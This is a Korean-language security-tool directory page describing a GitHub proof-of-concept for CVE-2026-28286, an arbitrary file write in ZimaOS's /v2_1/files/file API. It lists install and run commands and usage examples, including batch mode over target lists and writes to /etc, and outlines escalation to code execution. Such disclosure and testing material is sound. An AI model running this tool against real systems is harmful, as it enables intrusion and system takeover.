Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
zimaos-cve-2026-28286-arbitrary-file-write — PoC 및 검증 툴킷으로, ZimaOS의 임의 파일 쓰기 취약점인 CVE-2026-28286을 대상으로 하며, API 설정 오류를 악용하여 의도된 디렉터리 외부에 파일을 씁니다. | Kitploit
도구/GitHubGitHub/rushi9/zimaos-cve-2026-28286-arbitrary-file-write
Vulnerability AnalysisExploitationWeb Application ExploitationAPI Security TestingWeb SecurityPenetration Testing
GitHubrushi9/zimaos-cve-2026-28286-arbitrary-file-write

zimaos-cve-2026-28286-arbitrary-file-write

PoC 및 검증 툴킷으로, ZimaOS의 임의 파일 쓰기 취약점인 CVE-2026-28286을 대상으로 하며, API 설정 오류를 악용하여 의도된 디렉터리 외부에 파일을 씁니다.

저장소 보기웹사이트
214개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2026-28286 — ZimaOS 임의 파일 쓰기

API 설정 오류 → 임의 파일 쓰기 → 잠재적 시스템 장악

⚡ 요약

  • 엔드포인트: /v2_1/files/file
  • 문제점: 경로 검증 부재
  • 영향: 의도된 디렉터리 외부에 임의 파일 쓰기 가능
  • 심각도: 🔴 치명적

🧪 빠른 시작

root@kitploit:~
git clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py

⚙️ CLI 사용법

다음 명령으로 사용 가능한 모든 옵션을 확인할 수 있습니다:

root@kitploit:~
python poc.py -h

📌 사용 가능한 옵션

root@kitploit:~
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]

options:
  -h, --help            도움말 메시지 표시 후 종료
  -u, --url URL         단일 대상 URL
  -t, --targets TARGETS 대상 파일 (배치 모드)
  -p, --path PATH       사용자 지정 파일 경로 (기본값: /tmp)
  --proxy PROXY         프록시 URL (예: http://127.0.0.1:8080)
  --token TOKEN         Bearer 인증 토큰
  -n, --attempts        시도 횟수
  --delay               배치 요청 간 지연 시간 (초)

🚀 사용 예시

▶️ 1. 대화형 모드

root@kitploit:~
python poc.py

▶️ 2. 단일 대상

root@kitploit:~
python poc.py -u http://localhost:8080

▶️ 3. 사용자 지정 경로

root@kitploit:~
python poc.py -u http://localhost:8080 -p /tmp

▶️ 4. 민감 경로 대상 (랩 테스트)

root@kitploit:~
python poc.py -u http://localhost:8080 -p /etc

▶️ 5. 다중 시도

root@kitploit:~
python poc.py -u http://localhost:8080 -n 5

▶️ 6. 프록시 사용 (Burp Suite)

root@kitploit:~
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080

▶️ 7. 배치 모드

root@kitploit:~
python poc.py -t targets.txt

▶️ 8. 지연 시간이 있는 배치 모드

root@kitploit:~
python poc.py -t targets.txt --delay 2

▶️ 9. 전체 기능 모드 (모든 옵션)

root@kitploit:~
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN

💡 팁

Burp Suite와 함께 프록시 모드를 사용하여 다음을 수행하세요:

  • 요청 검사
  • 페이로드 수정
  • 백엔드 동작 확인

🧠 기술 분석

백엔드가 파일시스템 경계를 강제하지 않습니다:

  • ❌ 경로 정규화 없음
  • ❌ 기본 디렉터리 제한 없음
  • ❌ 사용자 제어 절대 경로 허용

이로 인해 다음 위치에 쓰기가 가능합니다:

root@kitploit:~
/tmp/
/etc/
/usr/local/bin/

💥 영향

root@kitploit:~
임의 파일 쓰기
        ↓
설정 / 스크립트 덮어쓰기
        ↓
권한 상승 / 원격 코드 실행


🎥 데모

image

📁 출력 예시

root@kitploit:~
[✔] 취약점 확인됨 (LISTING_SUCCESS)
경로: /tmp/CVE-2026-28286_⚠️_abc123.txt

⭐ 지원

유용하게 사용하셨다면 ⭐ 스타를 남겨주세요. 더 많은 연구자들이 이 작업을 발견하는 데 도움이 됩니다.


⚠️ 면책 조항

승인된 테스트에만 사용하세요.

도구 다운로드